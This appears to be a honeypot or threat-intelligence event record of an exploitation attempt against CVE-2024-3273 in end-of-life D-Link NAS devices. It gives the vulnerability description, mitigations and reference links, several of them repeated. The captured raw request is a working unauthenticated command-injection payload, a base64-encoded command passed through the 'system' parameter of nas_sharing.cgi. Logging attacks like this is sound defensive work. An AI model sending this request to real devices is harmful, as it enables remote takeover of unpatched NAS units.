Security event information 52b1a36d7bbcb4a0766b6ec1879f48d1

Информация об атаке

Tag
CVE-2024-3273

Date
2025-12-10

Client IP
64.225.115.99

Client GEO
united states

Vendor
D-Link

Product
DNS-320L

RAW request
GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=aWQ%3D HTTP/1.0 Host: blog.██████ X-Forwarded-For: █████████████ Connection: close

Description
CVE-2024-3273 is a critical command injection vulnerability affecting D-Link NAS devices, specifically models DNS-320L, DNS-325, DNS-327L, and DNS-340L, up to the firmware version dated April 3, 2024. The vulnerability resides in the HTTP GET Request Handler component, specifically in the /cgi-bin/nas_sharing.cgi file. By manipulating the 'system' argument, an attacker can inject and execute arbitrary commands on the device. This attack can be launched remotely and does not require prior authentication, making it highly exploitable. The vulnerability has been actively exploited in the wild, with over 90,000 devices potentially affected. The exploit has been publicly disclosed, and proof-of-concept code is available online. The critical nature of this vulnerability is underscored by its CVSS score of 9.8. It is important to note that these devices are no longer supported by D-Link, having reached their end-of-life (EOL) or end-of-service (EOS) status. As such, no official patches or updates will be provided to mitigate this issue.

Description

CVE-2024-3273 is a critical command injection vulnerability affecting D-Link NAS devices, specifically models DNS-320L, DNS-325, DNS-327L, and DNS-340L, up to the firmware version dated April 3, 2024. The vulnerability resides in the HTTP GET Request Handler component, specifically in the /cgi-bin/nas_sharing.cgi file. By manipulating the 'system' argument, an attacker can inject and execute arbitrary commands on the device. This attack can be launched remotely and does not require prior authentication, making it highly exploitable. The vulnerability has been actively exploited in the wild, with over 90,000 devices potentially affected. The exploit has been publicly disclosed, and proof-of-concept code is available online. The critical nature of this vulnerability is underscored by its CVSS score of 9.8. It is important to note that these devices are no longer supported by D-Link, having reached their end-of-life (EOL) or end-of-service (EOS) status. As such, no official patches or updates will be provided to mitigate this issue.

Mitigations
Retire and Replace: Since the affected devices are end-of-life and no longer supported, the primary recommendation is to retire and replace these devices with newer, supported models. Network Segmentation: Isolate the affected NAS devices from the rest of the network to minimize potential exploitation. Firewall Rules: Implement strict firewall rules to block access to the vulnerable endpoints from untrusted networks. Monitor and Respond: Continuously monitor network traffic for signs of exploitation and respond promptly to any suspicious activity. Disable Unnecessary Services: Disable any unnecessary services on the NAS devices to reduce the attack surface. Vendor Consultation: Consult with D-Link or a cybersecurity professional for further guidance and potential alternative solutions.

Mitigations


Retire and Replace: Since the affected devices are end-of-life and no longer supported, the primary recommendation is to retire and replace these devices with newer, supported models.
Network Segmentation: Isolate the affected NAS devices from the rest of the network to minimize potential exploitation.
Firewall Rules: Implement strict firewall rules to block access to the vulnerable endpoints from untrusted networks.
Monitor and Respond: Continuously monitor network traffic for signs of exploitation and respond promptly to any suspicious activity.
Disable Unnecessary Services: Disable any unnecessary services on the NAS devices to reduce the attack surface.
Vendor Consultation: Consult with D-Link or a cybersecurity professional for further guidance and potential alternative solutions.

Links
https://censys.com/cve-2024-3272-and-2024-3273/ https://censys.com/cve-2024-3273/ https://github.com/Chocapikk/CVE-2024-3273 https://github.com/adhikara13/CVE-2024-3273 https://nvd.nist.gov/vuln/detail/CVE-2024-3273 https://tehtris.com/en/blog/honeypots-focus-on-cve-2024-3273/ https://thehackernews.com/2024/04/critical-flaws-leave-92000-d-link-nas.html https://www.bleepingcomputer.com/news/security/over-92-000-exposed-d-link-nas-devices-have-a-backdoor-account/ https://www.cvedetails.com/cve/CVE-2024-3273/ https://www.greynoise.io/blog/cve-2024-3273-d-link-nas-rce-exploited-in-the-wild https://www.helpnetsecurity.com/2024/04/08/cve-2024-3273/ https://www.securityweek.com/exploitation-attempts-target-unpatched-flaw-affecting-many-d-link-nas-devices/ https://www.stormshield.com/news/security-alert-d-link-cve-2024-3272-cve-2024-3273-stormshields-product-response/ https://www.tenable.com/cve/CVE-2024-3273

Links

https://censys.com/cve-2024-3272-and-2024-3273/
https://censys.com/cve-2024-3273/
https://github.com/Chocapikk/CVE-2024-3273
https://github.com/adhikara13/CVE-2024-3273
https://nvd.nist.gov/vuln/detail/CVE-2024-3273
https://tehtris.com/en/blog/honeypots-focus-on-cve-2024-3273/
https://thehackernews.com/2024/04/critical-flaws-leave-92000-d-link-nas.html
https://www.bleepingcomputer.com/news/security/over-92-000-exposed-d-link-nas-devices-have-a-backdoor-account/
https://www.cvedetails.com/cve/CVE-2024-3273/
https://www.greynoise.io/blog/cve-2024-3273-d-link-nas-rce-exploited-in-the-wild
https://www.helpnetsecurity.com/2024/04/08/cve-2024-3273/
https://www.securityweek.com/exploitation-attempts-target-unpatched-flaw-affecting-many-d-link-nas-devices/
https://www.stormshield.com/news/security-alert-d-link-cve-2024-3272-cve-2024-3273-stormshields-product-response/
https://www.tenable.com/cve/CVE-2024-3273

Community

Contacts

Cloud

Sattelite

Информация об атаке

Engine

Sattelite

Radar

Cloud

Blog

Community

Контакты